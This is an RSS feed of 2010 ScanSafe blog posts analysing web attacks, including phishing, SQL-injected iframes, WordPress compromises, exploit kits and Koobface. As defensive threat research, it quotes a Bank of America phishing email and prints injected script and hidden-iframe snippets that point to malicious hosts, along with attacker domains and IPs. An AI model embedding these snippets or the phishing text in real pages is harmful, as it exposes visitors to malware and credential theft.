<?xml version="1.0" encoding="UTF-8"?>
<!--Generated by Squarespace Site Server v5.11.5 (http://www.squarespace.com/) on Thu, 02 Sep 2010 15:38:28 GMT--><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:rss="http://purl.org/rss/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:cc="http://web.resource.org/cc/"><rss:channel rdf:about="http://blog.scansafe.com/journal/"><rss:title>ScanSafe Blog</rss:title><rss:link>http://blog.scansafe.com/journal/</rss:link><rss:description></rss:description><dc:language>en-US</dc:language><dc:date>2010-09-02T15:38:29Z</dc:date><admin:generatorAgent rdf:resource="http://www.squarespace.com/">Squarespace Site Server v5.11.5 (http://www.squarespace.com/)</admin:generatorAgent><rss:items><rdf:Seq><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/7/12/phish-with-a-side-of-barbecue.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/6/9/wsj-a-victim-not-the-source-of-sql-injection.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/6/8/robintus-a-poster-child-for-repeat-injections.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/6/1/godaddy-attacks-top-web-malware-in-may.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/5/12/possible-root-compromise-of-greatandhracom.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/5/6/wordpress-hacks-not-just-netsol-and-godaddy.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/5/4/grepadcom-iframe-nets-govt-niche-sites.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/4/12/google-celeb-searches-lead-to-qooglesearch-malware.html"/><rdf:li rdf:resource="http://blog.scansafe.com/journal/2010/4/9/how-massive-is-koobface-really.html"/><rdf:li 
rdf:resource="http://blog.scansafe.com/journal/2010/4/9/attackers-triple-play-to-deliver-zero-days.html"/></rdf:Seq></rss:items></rss:channel><rss:item rdf:about="http://blog.scansafe.com/journal/2010/7/12/phish-with-a-side-of-barbecue.html"><rss:title>Phish with a Side of Barbecue</rss:title><rss:link>http://blog.scansafe.com/journal/2010/7/12/phish-with-a-side-of-barbecue.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-07-12T18:07:00Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>Looks like the latest Bank of America phishing scam is springboarding off a couple of compromised websites. First, here's a look at the predictably worded phishing email:</p>
<blockquote>
<p>&nbsp;Dear Bank of America Customer,<br /> <br /> We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you.<br /> <br /> To restore your account, please Sign in to Online Banking.</p>
</blockquote>
<p>Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now gramsbbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at:</p>
<p>http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm</p>
<p>This use of compromised sites as redirectors and phishing hosts enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/6/9/wsj-a-victim-not-the-source-of-sql-injection.html"><rss:title>WSJ a Victim, Not the Source, of SQL Injection</rss:title><rss:link>http://blog.scansafe.com/journal/2010/6/9/wsj-a-victim-not-the-source-of-sql-injection.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-06-10T04:13:18Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>As mentioned <a href="http://blog.scansafe.com/journal/2010/6/8/robintus-a-poster-child-for-repeat-injections.html">earlier this week</a>, about 7k pages (not sites) have been struck by SQL-injected iframes pointing to malware on robint.us. (That number has been over-inflated to over 100k or even a million in some reports, due to poorly constructed search queries; that was the subject of the previous post on the topic.)</p>
<p>Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe's investigation reveals that the SQL injection attack which appeared on certain pages of the WSJ site wasn't the result of a compromise of WSJ directly, but rather the result of a compromise of a third-party partner.</p>
<p>That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website.</p>
<p>Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/6/8/robintus-a-poster-child-for-repeat-injections.html"><rss:title>Robint.us a Poster Child for Repeat Injections</rss:title><rss:link>http://blog.scansafe.com/journal/2010/6/8/robintus-a-poster-child-for-repeat-injections.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-06-08T20:59:47Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>One of many SQL injection attacks is getting some blogger attention, largely due to generic searches on the malware domain name. The malicious iframe on the compromised site is:</p>
<p>script src=http://ww.robint.us/u.js</p>
<p>Search on the full iframe with quotes and you get about 7k hits in Google. But search on just the domain name, or omit the quotes, and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search leads some to believe the attack is much larger than it really is.</p>
<p>Certainly 7k Web pages compromised is nothing to sneeze at, but it's not a million pages, and it's nothing new - many of these same pages have been repeatedly compromised in one SQL injection attack after another since 2007.</p>
<p>On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, an attack like robint.us is just one of over a thousand unique attacks carried out via the Web each month.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/6/1/godaddy-attacks-top-web-malware-in-may.html"><rss:title>GoDaddy Attacks Top Web Malware in May</rss:title><rss:link>http://blog.scansafe.com/journal/2010/6/1/godaddy-attacks-top-web-malware-in-may.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-06-01T21:04:19Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>Some interesting stats from May.</p>
<ul>
<li>16196 unique malicious domains. </li>
<li>The top ten malicious domains comprised 23% of all Web malware attacks in May 2010. </li>
<li>Five of the top ten were related to attacks against <a href="http://blog.scansafe.com/journal/2010/5/6/wordpress-hacks-not-just-netsol-and-godaddy.html">GoDaddy-hosted websites</a>, for a total of 14% of all Web malware in May 2010. </li>
<li>Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites. </li>
<li>Gumblar was the second most prevalent Web malware encountered, at 7%. </li>
<li>Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.</li>
</ul>
<p><strong>Top Ten Malicious Domains, May 2010</strong><br /><br />holasionweb.com* - 7%<br />www.sitepalace.com - 3%<br />losotrana.com* - 2%<br />indesignstudioinfo.com* - 2%<br />kdjkfjskdfjlskdjf.com* - 2%<br />easfindnex.org - 2%<br />findermar.org - 2%<br />76.73.33.109 - 2%<br />findrasup.org - 1%<br />zettapetta.com* - 1%<br /><br style="font-size: 70%;" /><span style="font-size: 80%;">*Related to attacks against GoDaddy-hosted websites</span><br /><br /><strong>Top Ten Web Malware, May 2010</strong><br /><br />Trojan.JS.Redirector.cq - 14%<br />Exploit.JS.Gumblar - 7%<br />Backdoor.Win32.Alureon - 6%<br />Exploit.Java.CVE-2009-3867.d - 3%<br />Trojan.JS.Redirector.at - 3%<br />Downloader.JS.Agent.fhx - 2%<br />OI.Backdoor.Win32.Autorun.cx - 2%<br />OI.Win32.Susp.ms - 2%<br />Trojan.Iframe.f - 2%<br />Trojan.GIFIframe.a - 2%</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/5/12/possible-root-compromise-of-greatandhracom.html"><rss:title>Possible Root Compromise of Greatandhra.com</rss:title><rss:link>http://blog.scansafe.com/journal/2010/5/12/possible-root-compromise-of-greatandhracom.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-05-12T19:42:22Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>A new attack emanating from the malware domain v3p2.com may be linked to a possible (alleged) root compromise of greatandhra.com, a news and media site with a worldwide Alexa rating of 2339.</p>
<p>The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a> / <a href="http://www.microsoft.com/technet/security/Bulletin/MS10-018.mspx">MS10-018</a>).</p>
<p>Successful exploitation leads to the silent installation of a data theft trojan delivered from n9uo.com. Both attack domains - v3p2.com and n9uo.com - were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website.</p>
<p>Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained.</p>
<p>First encounters resulting from this attack began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/5/6/wordpress-hacks-not-just-netsol-and-godaddy.html"><rss:title>WordPress Hacks: Not Just NetSol and GoDaddy</rss:title><rss:link>http://blog.scansafe.com/journal/2010/5/6/wordpress-hacks-not-just-netsol-and-godaddy.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-05-06T07:36:47Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>Over the past month or so, there has been a series of ongoing compromises that have been interchangeably blamed on WordPress, Network Solutions, or GoDaddy. However, the attacks are occurring on many other hosts as well, including:</p>
<p>1 & 1<br />DreamHost<br />In2Net<br />Hostway<br />Media Temple<br />ServerBeach<br /><br />and several others. While many of the compromised sites are using WordPress, some are not.</p>
<p>The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites.</p>
<p><strong>Google / WordPress Pharma Hacks</strong></p>
<p>In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site.</p>
<p>Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=<em>compromised.com</em>" where compromised.com equals the name of the legitimate (but compromised site) that is delivering the redirect.</p>
<p>The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used.</p>
<p><strong>Grepad.com Attacks</strong></p>
<p>The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit viagra, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Exploits of multiple vulnerabilities are attempted in order to download this malware. A list of observed exploits can be found <a href="http://blog.scansafe.com/journal/2010/5/4/grepadcom-iframe-nets-govt-niche-sites.html">in this blog post</a>.</p>
<p><strong>Commonalities Between Attacks<br /></strong></p>
<p>In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally.</p>
<p>The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits.</p>
<p>Filtering is also being done by IP address ranges, operating system, and user_agent to determine when the embedded iframe (or pharma redirect) will occur.</p>
<p><strong>The Million Dollar Question: How?</strong></p>
<p>The why is easy to answer: attackers want to make money. The how is a bit more cloudy.</p>
<p>It appears the attacker is able to read wp-config.php, which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp_options table of the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess and uploaded malicious scripts, which then embed the iframe.</p>
<p>At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed over to other sites on the same hosted share can still occur.</p>
<p>It's worth noting that the U.S. Bureau of Engraving and Printing sites (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the Grepad.com attacks. While neither of these sites appears to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/5/4/grepadcom-iframe-nets-govt-niche-sites.html"><rss:title>Grepad.com Iframe Nets Gov't, Niche Sites</rss:title><rss:link>http://blog.scansafe.com/journal/2010/5/4/grepadcom-iframe-nets-govt-niche-sites.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-05-04T17:02:46Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>ScanSafe traffic analysis reveals that a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com, which attempts to exploit a series of vulnerabilities. Observed exploits include:</p>
<ul>
<li>Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992)</li>
<li>Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927)</li>
<li>Office OCX OpenWebFile (BID-33243)</li>
<li>Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388)</li>
<li>Hummingbird PerformUpdateAsync (CVE-2008-4728)</li>
<li>Peachtree ExecutePreferredApplication (CVE-2008-4699)</li>
<li>C6 Messenger propDownloadUrl (CVE-2008-2551)</li>
<li>Internet Explorer memory corruption (MS09-002)</li>
</ul>
<p>The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in <a href="http://blog.networksolutions.com/2010/we-feel-your-pain-and-are-working-hard-to-fix-this/">attacks on Network Solutions hosted WordPress blogs</a>. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net.</p>
<p>Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks has also been targeted against WordPress-published sites hosted by GoDaddy.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/4/12/google-celeb-searches-lead-to-qooglesearch-malware.html"><rss:title>Google Celeb Searches Lead to qooglesearch Malware</rss:title><rss:link>http://blog.scansafe.com/journal/2010/4/12/google-celeb-searches-lead-to-qooglesearch-malware.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-04-13T00:30:41Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>Whatever the latest hot topic is, chances are the blackhat SEO criminals are already poised to cash in. Over this past weekend, ScanSafe saw a surge in celebrity searches leading to malware encounters, mostly rogue scareware. The method of encounter varies by browser type. For example, Internet Explorer users encounter the malware directly after clicking a poisoned search results link, whereas Firefox users are first redirected to the bogus lookalike qooglesearch.com (note the Q in the domain name). The scareware domains vary slightly, but follow the same format: www#.duforing##.xorg.pl (where # signifies a number).</p>
<p>The malicious links in the search engine results pages (SERPs) look innocent enough at first glance:</p>
<p><span class="full-image-block ssNonEditable"><span><img src="http://blog.scansafe.com/storage/post-images/ericabadu.jpg?__SQUARESPACE_CACHEVERSION=1271121877903" alt="" /></span></span></p>
<p>Look more closely however, and you'll note the nonsensical phrasing in the shadowdesigns.co.uk and poshpongs.com results that are sandwiched between mtv.com and last.fm. Equally telling is the ?sdoc=erica+badu appended to those links.</p>
<p>Searching inurl:.php/?sdoc=erica+badu on Google reveals about 400 sites are being used to promote malicious Erica Badu links. A more generic search for inurl:.php/?sdoc= results in even more poisoned listings for various celebs and diverse topics. The Yahoo search engine was also observed dishing up malicious search results over the past weekend for topics ranging from the CN Tower design to extraterrestrial invasions.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/4/9/how-massive-is-koobface-really.html"><rss:title>How Massive is Koobface, Really?</rss:title><rss:link>http://blog.scansafe.com/journal/2010/4/9/how-massive-is-koobface-really.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-04-10T03:45:36Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>Koobface is a human-powered worm that sends itself to everyone listed in an infected user's social network. Those who fall for the message, click the link, and install the bogus codec will then perpetuate the worm's spread through their own social networking contacts. But just how likely <em>are </em>users to click through and infect themselves?</p>
<p>In 2009, Koobface comprised considerably less than 1% of all Web malware. A closer look at 2010 data reveals that less than 10% of enterprises actually have users that click a Koobface link. The highest rate was March, when 11% had users that clicked through; the lowest was February at 6%. Of those enterprises that do click through, the median rate per enterprise is only 3 clicks each.</p>
<p>For total volume, in January 2010, Koobface comprised only 0.55% of all Web malware; February was lowest at 0.15%, and March the highest at 3.1%.</p>
<p>Thus far in April, only 1% of enterprises have users that clicked a Koobface link. The median rate for those is 3 clicks each. Currently Koobface comprises only 1% of April Web malware blocks.</p>
<p>However, if you happen to be located in Zimbabwe it's a completely different story. Zimbabwe sports a Koobface-clickthrough rate that's hundreds of times above the norm.</p>]]></content:encoded></rss:item><rss:item rdf:about="http://blog.scansafe.com/journal/2010/4/9/attackers-triple-play-to-deliver-zero-days.html"><rss:title>Attackers Triple Play to Deliver Zero Days</rss:title><rss:link>http://blog.scansafe.com/journal/2010/4/9/attackers-triple-play-to-deliver-zero-days.html</rss:link><dc:creator>Mary Landesman</dc:creator><dc:date>2010-04-09T17:23:06Z</dc:date><dc:subject></dc:subject><content:encoded><![CDATA[<p>ScanSafe STAT has been investigating an ongoing series of attacks which has been a hotbed for zero day exploits over the first quarter of 2010. The attackers are using three layers of legitimate sites. Two layers are compromised websites used to host malicious content that is then pushed to a third layer of legitimate websites via syndicated ads. In its current rendition, the attacks are being delivered to financial services themed websites. Previous rounds have been delivered via syndicated ads on Wikia-hosted websites and assorted game forums.<br /><br />The ads pull content from an attacker-planted HTML file contained in the /images directory of the compromised site. (Method of compromise is not known, but it's presumed to be a result of stolen FTP credentials.) The path/filename consists of:<br /><br />&lt;<em>compromised site</em>&gt;/images/r.html<br /><br />That file carries an obfuscated iframe; when deobfuscated, the iframe points to malicious content planted on yet another compromised site:<br /><br />&lt;div style="visibility:hidden"&gt;&lt;iframe src="http://&lt;<em>compromised site</em>&gt;/images/onotole.html" width=1 height=1&gt;&lt;/iframe&gt;&lt;/div&gt;<br /><br />That page is in turn yet another iframe:<br /><br />&lt;div style="visibility:hidden"&gt;&lt;iframe src="http://74.86.40.211/tds/" width=1 height=1&gt;&lt;/iframe&gt;&lt;/div&gt;<br /><br />IPs involved in previous rounds include 212.117.163.201, 212.117.180.54, and 208.67.250.106.<br /><br />The current iframe leads to http://ahjcwkbathr.com/ld/wir, which creates a script tag pointing to a file on the same domain that contains the exploit code. Over the course of these attacks, which began in late January, the attackers have been quick to incorporate the latest zero day du jour. These have included:<br /><br />CVE-2010-0806 Internet Explorer uninitialized memory corruption vulnerability<br />CVE-2009-4324 "use-after-free" vulnerability in Adobe Reader/Acrobat<br />CVE-2009-3867 HsbParser.getSoundBank buffer overflow vulnerability in Sun Java<br /><br />Mixed in with these have been an assortment of older exploits for Adobe Flash, Microsoft DirectShow, and miscellaneous Adobe Reader/Acrobat PDF exploits.</p>
<p>Successful exploitation leads to the download of a binary (also hosted on the same domain) which in observed cases has been a variant of the Bredolab trojan.<br /><a href="http://www.virustotal.com/analisis/ef614084582abbeba2609177f33244f5978892ac85a5613a687965a482388b0e-1269983048"><br />http://www.virustotal.com/analisis/ef614084582abbeba2609177f33244f5978892ac85a5613a687965a482388b0e-1269983048</a><br /><br />Bredolab acts as a downloader agent. In the cases we've observed, this particular variant of Bredolab is downloading Zbot/Zeus.</p>
<p>Encounters with these attacks are fairly steady and comprised 1% of all ScanSafe Web malware blocks in March (compared to Gumblar at 17%). What's particularly interesting about these attacks isn't the volume, but rather that they appear to be a vector for rapid deployment of the latest zero day exploits. And while the IP addresses and domain names for the attacker-owned sites have changed, the delivery method has remained constant.</p>]]></content:encoded></rss:item></rdf:RDF>